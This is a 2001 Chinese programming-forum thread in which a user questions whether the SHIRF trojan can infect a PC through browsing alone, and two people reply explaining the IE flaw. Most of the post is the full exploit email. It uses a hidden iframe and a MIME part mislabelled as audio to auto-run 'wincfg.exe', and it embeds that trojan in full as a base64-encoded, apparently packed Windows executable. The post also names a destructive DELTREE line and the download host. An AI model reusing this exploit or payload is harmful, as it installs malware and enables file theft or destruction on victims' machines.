关于SHIRF木马的疑问

sjy 2001-08-05 05:41:06
我以前一直鼓楼挂问,以为在网上只是
浏览不会中木马和病毒。前两天有个同事
提到只浏览也会中木马,我不信。
今天看了电脑报,其中网络安全版有
片文章-恶议代码与网络安全--木马篇
分析了一个可以通过浏览传播的木马。
www.shirf.(this should be 51.)net,假如大家
用的是IE5,安全为中的话(不关ACTIVEX事),就可以传播,
用的是MIME的漏洞。这文章写得挺详细
,不由得我不信。不过我一向是怀疑主义者。
我按报纸的做法DOWN了他的WINCFG.EML,
对比了一下,确有可疑之处。
据说中了后,REGISTER 的RUN里会有
WINCFG.exe(就是以下的代码经BASE64编译成的,利用了WINDOWS MIME的漏洞),

我没有尝试,但我相信这东西是有杀伤力的,至少帮
AUTOEXEC。BAT加一句DELTREE *。*还是OK的(BUT IT IS SAID
THAT THIS HORSE JUST DO SOME OICQ INFORM AND FILE TRANSER FUNCTION。。。)
小弟胆小,请大胆人帮验证一下。

you can down source from (http://shirf.(this should be 51.)net/wincfg.eml)
using netants.or you want to see the detail,you can buy a 2001.7.30's
cpcw)

From: "xxx" <xxxx@xxx.xxx>
To: "xxx" <xxxx@xxx.xxx>
Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative;
boundary="2"


--2
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
<BR>
</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAABf97C9G5be7huW3u4blt7uG5bf7jKW3u5Ctc3uFpbe7ue2zO4alt7uUmlj
aBuW3u4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDAFF5oDoAAAAAAAAAAOAADwELAQUM
ABAAAAAQAAAAQAAAoFcAAABQAAAAYAAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABwAAAA
EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAABgAACAAQAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFVQWDAAAAAA
AEAAAAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOBVUFgxAAAAAAAQAAAAUAAAAAoAAAAEAAAA
AAAAAAAAAAAAAABAAADgVVBYMgAAAAAAEAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAwAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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
AAAAAAAAAADqYAAArGAAAAAAAAAAAAAAAAAAAPVgAAC0YAAAAAAAAAAAAAAAAAAAAWEAALxgAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAxhAAAaYQAAKmEAAAAAAAA4YQAAAAAAAEZhAAAAAAAAVmEAAAAA
AABkYQAAAAAAAHMAAIAAAAAAS0VSTkVMMzIuRExMAEFEVkFQSTMyLmRsbABTSEVMTDMyLmRsbABV
U0VSMzIuZGxsAFdJTklORVQuZGxsAFdTT0NLMzIuZGxsAABMb2FkTGlicmFyeUEAAEdldFByb2NB
ZGRyZXNzAABFeGl0UHJvY2VzcwAAAFJlZ09wZW5LZXlBAAAAU2hlbGxFeGVjdXRlQQAAAFBlZWtN
ZXNzYWdlQQAASW50ZXJuZXRHZXRDb25uZWN0ZWRTdGF0ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

--1

这个“木马”只有6K,我觉得6K的程序对于病毒就比较大了,
有小陈当年写CIH的注释为证:
; *==========================================================================*
; * v1.3 1. modify the bug that winzip self-extractor occurs error. *
; * so when open winzip self-extractor ==> don't infect it. *
; * 05/24/1998 2. the virus "basic" size is 1010 bytes. *
; *==========================================================================*
; * v1.4 1. full modify the bug : winzip self-extractor occurs error. *
; * 2. change the date of killing computers. *
; * 05/31/1998 3. modify virus version copyright. *
; * 4. the virus "basic" size is 1019 bytes. *
; ****************************************************************************
但对于木马来说好象又不能干什么,以前看BO2000的SOURCE,
光用来实现服务器端与客户端的TCP/IP连接已用了几百行程序,
编译出来的东西象个应用程序那么大。所以我对这个木马的FTP,OICQ
能力有点怀疑。
但如果这个木马能搞一个EXE在你的电脑里运行的话,它就能够传播CIH之类的病毒,
但我以前一直没有听说过任何人在这方面的警告,如果这是真的,恐怕也轮不
到我来发现。所以这就是我对这个问题的怀疑之处,但我不希望有这种东西存在
在互联网上,这会打击我上网的乐趣。

最后问一下,有没有人知道有什么信得过的地方可以DOWN些防火墙之类的东西,
帮介绍一下。不过我觉得PC防火增防木马可以,防最新的病毒恐怕有点困难。
...全文
87 点赞 收藏 2
写回复
2 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
alphapaopao 2001-08-05
那是IE的漏洞,IE没有正确区别多媒体数据和可执行代码,就去WinExec(),呵呵,于是就死菜乐
回复
ssh_zy 2001-08-05
我也看了电脑报,也down过,没事,删了就没事了
(其实说不定你已经一不小心运行了)
回复
相关推荐
发帖
VC/MFC
创建于2007-09-28

1.5w+

社区成员

VC/MFC相关问题讨论
申请成为版主
帖子事件
创建了帖子
2001-08-05 05:41
社区公告

        VC/MFC社区版块或许是CSDN最“古老”的版块了,记忆之中,与CSDN的年龄几乎差不多。随着时间的推移,MFC技术渐渐的偏离了开发主流,若干年之后的今天,当我们面对着微软的这个经典之笔,内心充满着敬意,那些曾经的记忆,可以说代表着二十年前曾经的辉煌……
        向经典致敬,或许是老一代程序员内心里面难以释怀的感受。互联网大行其道的今天,我们期待着MFC技术能够恢复其曾经的辉煌,或许这个期待会永远成为一种“梦想”,或许一切皆有可能……
        我们希望这个版块可以很好的适配Web时代,期待更好的互联网技术能够使得MFC技术框架得以重现活力,……